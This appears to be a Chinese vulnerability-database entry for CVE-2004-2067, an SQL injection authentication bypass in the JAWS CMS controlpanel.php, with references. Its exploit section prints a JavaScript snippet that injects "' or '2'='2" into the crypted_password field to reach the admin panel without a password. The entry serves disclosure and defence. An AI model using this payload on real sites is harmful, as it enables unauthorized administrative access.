JAWS ControlPanel.php SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108090 漏洞类型 输入验证
发布时间 2004-07-29 更新时间 2006-06-15
CVE编号 CVE-2004-2067 CNNVD-ID CNNVD-200407-096
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/24334
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200407-096
|漏洞详情
Jaws是一款动态构建WEB站点的内容管理系统。Jawscontrolpanel.php脚本不正确处理用户提交的URI参数,远程攻击者可以利用这个漏洞无需要提供密码访问管理员控制面版。由于controlpanel.php脚本对用户提交给"crypted_password"变量缺少正确的逻辑检查,攻击者提交类似'''or'2'='2''的数据,可导致逻辑错误,无需提供正确密码通过验证访问应用程序管理面版。
|漏洞EXP
source: http://www.securityfocus.com/bid/10826/info

JAWS is reportedly affected by a remote SQL injection vulnerability. This issue occurs in the controlpanel.php script due to a failure of the application to properly sanitize user-supplied URI parameter input before using it in an SQL query.

Because of this, a malicious user may influence database queries in order to view or modify sensitive information, potentially compromising the software or the database.

<script type="text/javascript">

function crypt_form(form) {
var new_password = calcMD5(form.password.value);
form.crypted_password.value = "' or '2'='2";
form.password.value = "";
return true;
}
</script>
|参考资料

来源:XF
名称:jaws-controlpanel-sql-injection(16847)
链接:http://xforce.iss.net/xforce/xfdb/16847
来源:BID
名称:10826
链接:http://www.securityfocus.com/bid/10826
来源:OSVDB
名称:8320
链接:http://www.osvdb.org/8320
来源:SECTRACK
名称:1010815
链接:http://securitytracker.com/id?1010815
来源:BUGTRAQ
名称:20040729Jaws0.4:authenticationbypass
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=109116345930380&w=2